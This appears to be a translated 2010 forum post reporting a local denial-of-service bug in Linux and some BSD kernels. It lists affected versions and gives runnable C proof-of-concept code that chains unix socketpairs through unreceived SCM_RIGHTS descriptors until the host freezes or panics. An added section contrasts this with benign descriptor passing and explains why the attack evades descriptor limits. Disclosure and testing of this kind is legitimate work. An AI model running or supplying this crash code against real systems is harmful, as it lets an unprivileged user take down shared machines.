data:image/s3,"s3://crabby-images/cf72b/cf72ba08847f01ce18a0e4cbd136c2ec725b4421" alt=""
Local DoS vulnerability in the Linux kernel (and not only)
Code has been published that causes the machine to freeze (100% load on all cores, file descriptor exhaustion).
Link to code: lkml.org/lkml/2010/11/25/8
Checked on 2.6.27 and 2.6.32: the hang reproduces, on both 32- and 64-bit.
To clarify: after 1-2 seconds a crash dump scrolls by (I don't have time to read it) and the host reboots. In another test the system crashed after the program had finished (after about 5-7 seconds).
PS Experts on LOR say that FreeBSD 8.1 also crashes.
PPS Surprisingly, on CentOS 5.5 with 2.6.18 it does not crash. If run as root it crashes; as a regular user it just runs quietly. In that case root in a neighbouring console can keep working and the system does not crash.
Trying to clarify the situation:
1) CentOS 2.6.18 / 64 with an unprivileged user is not affected.
2) Debian Squeeze 2.6.34 / 64 with an unprivileged user is affected (kernel panic).
3) Rumour has it that it reproduced on some FreeBSD (from the comments: not reproducible on FreeBSD 8.2-PRERELEASE).
4) From the comments: not reproducible on Ubuntu 2.6.32 / 64, reproducible on 2.6.36.
5) Ubuntu 2.6.34 / 64 reproduces.
6) From the comments: RHEL 5.5 does not freeze, but it slows down and the process cannot be killed.
7) From the comments: FreeBSD 4.11, 8.1, OpenBSD 4.6, 4.8, DragonFly BSD 2.8.0 are affected.
8) OpenVZ + 2.6.18 Debian / CentOS: not reproducible.
PPPS For those testing: it must be run as an unprivileged user.
Test code:
```c
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Send descriptor `fd` over the AF_UNIX socket `unix_fd` as SCM_RIGHTS
   ancillary data. No payload byte is attached; Linux accepts that. */
static int send_fd(int unix_fd, int fd)
{
	struct msghdr msgh;
	struct cmsghdr *cmsg;
	char buf[CMSG_SPACE(sizeof(fd))];

	memset(&msgh, 0, sizeof(msgh));
	memset(buf, 0, sizeof(buf));

	msgh.msg_control = buf;
	msgh.msg_controllen = sizeof(buf);

	cmsg = CMSG_FIRSTHDR(&msgh);
	cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
	cmsg->cmsg_level = SOL_SOCKET;
	cmsg->cmsg_type = SCM_RIGHTS;

	msgh.msg_controllen = cmsg->cmsg_len;

	memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));
	return sendmsg(unix_fd, &msgh, 0);
}

int main(void)
{
	int fd[2], ff[2];

	if (socketpair(PF_UNIX, SOCK_SEQPACKET, 0, fd) == -1)
		return 1;

	/* Each round: create a fresh pair, send both ends of the previous
	   pair into it, then close the previous pair. Nothing is ever
	   received, so the old sockets stay alive only as in-flight
	   descriptors queued inside the new pair, forming an ever-deeper
	   chain that the process's own fd table never accounts for. */
	for (;;) {
		if (socketpair(PF_UNIX, SOCK_SEQPACKET, 0, ff) == -1)
			return 2;

		send_fd(ff[0], fd[0]);
		send_fd(ff[0], fd[1]);

		close(fd[1]);
		close(fd[0]);

		fd[0] = ff[0];
		fd[1] = ff[1];
	}
}
```
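For comparison, the following is an added example (not the poster's code and not from the lkml report) showing the two benign sides of the same mechanism the PoC abuses: a descriptor passed with SCM_RIGHTS and actually received by the peer, and a descriptor sent but never received, which lives only in the socket's queue until both socket ends are closed and the kernel drops it. The function names `fd_pass_roundtrip` and `inflight_fd_released_on_close` are my own; the code assumes a Linux AF_UNIX implementation and a pipe as the passed file.

```c
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

/* Send descriptor `fd` over AF_UNIX socket `sock` as SCM_RIGHTS ancillary data.
   One payload byte rides along (portable; the PoC above sends none). */
static int send_fd(int sock, int fd)
{
    struct msghdr msgh;
    struct cmsghdr *cmsg;
    char buf[CMSG_SPACE(sizeof(int))];
    char payload = 'F';
    struct iovec iov = { &payload, 1 };

    memset(&msgh, 0, sizeof(msgh));
    memset(buf, 0, sizeof(buf));
    msgh.msg_iov = &iov;
    msgh.msg_iovlen = 1;
    msgh.msg_control = buf;
    msgh.msg_controllen = sizeof(buf);

    cmsg = CMSG_FIRSTHDR(&msgh);
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    memcpy(CMSG_DATA(cmsg), &fd, sizeof(int));

    return sendmsg(sock, &msgh, 0) == 1 ? 0 : -1;
}

/* Receive one SCM_RIGHTS descriptor from `sock`; returns the new fd or -1. */
static int recv_fd(int sock)
{
    struct msghdr msgh;
    struct cmsghdr *cmsg;
    char buf[CMSG_SPACE(sizeof(int))];
    char payload;
    struct iovec iov = { &payload, 1 };
    int fd = -1;

    memset(&msgh, 0, sizeof(msgh));
    msgh.msg_iov = &iov;
    msgh.msg_iovlen = 1;
    msgh.msg_control = buf;
    msgh.msg_controllen = sizeof(buf);

    if (recvmsg(sock, &msgh, 0) != 1)
        return -1;
    for (cmsg = CMSG_FIRSTHDR(&msgh); cmsg; cmsg = CMSG_NXTHDR(&msgh, cmsg))
        if (cmsg->cmsg_level == SOL_SOCKET && cmsg->cmsg_type == SCM_RIGHTS) {
            memcpy(&fd, CMSG_DATA(cmsg), sizeof(int));
            break;
        }
    return fd;
}

/* Normal use: pass a pipe's write end, drop the sender's copy, and show the
   receiver holds a live duplicate. Returns 0 on success, else the failed step. */
int fd_pass_roundtrip(void)
{
    int sv[2], p[2], got;
    char c = 0;

    if (socketpair(AF_UNIX, SOCK_SEQPACKET, 0, sv) == -1) return 1;
    if (pipe(p) == -1) return 2;
    if (send_fd(sv[0], p[1]) == -1) return 3;
    close(p[1]);              /* sender's copy gone; the in-flight reference keeps it open */
    got = recv_fd(sv[1]);     /* receiver installs it, ending the in-flight state */
    if (got < 0) return 4;
    if (write(got, "k", 1) != 1) return 5;   /* write through the duplicate ... */
    if (read(p[0], &c, 1) != 1) return 6;    /* ... and it arrives on the original pipe */
    close(got); close(p[0]); close(sv[0]); close(sv[1]);
    return c == 'k' ? 0 : 7;
}

/* The state the PoC piles up: a descriptor sent but never received exists only
   in the socket queue. Closing both socket ends must make the kernel release it,
   which shows up here as EOF on the pipe's read end. Returns 0 if released. */
int inflight_fd_released_on_close(void)
{
    int sv[2], p[2];
    char c;
    ssize_t n;

    if (socketpair(AF_UNIX, SOCK_SEQPACKET, 0, sv) == -1) return 1;
    if (pipe(p) == -1) return 2;
    if (fcntl(p[0], F_SETFL, O_NONBLOCK) == -1) return 3;  /* never block if the writer leaks */
    if (send_fd(sv[0], p[1]) == -1) return 4;
    close(p[1]);              /* only the queued in-flight copy remains */
    close(sv[0]);
    close(sv[1]);             /* queued message destroyed with the socket; its fd is put */
    n = read(p[0], &c, 1);    /* 0 = EOF, no writer left; -1/EAGAIN = writer still alive */
    close(p[0]);
    return n == 0 ? 0 : 5;
}

int main(void)
{
    printf("roundtrip: %d\n", fd_pass_roundtrip());
    printf("inflight released on close: %d\n", inflight_fd_released_on_close());
    return 0;
}
```

The second function is the point of contrast with the PoC: a single unreceived descriptor is reclaimed as soon as the socket holding it goes away, but the PoC never closes the newest pair, so every earlier pair is reachable only through the queue of a later one and the chain can only be torn down by the kernel's unix-socket garbage collector once the process exits. The in-flight descriptors never appear in the process's fd table, so RLIMIT_NOFILE does not bound them, which is why an unprivileged user suffices and why the crash can land after the program has already ended.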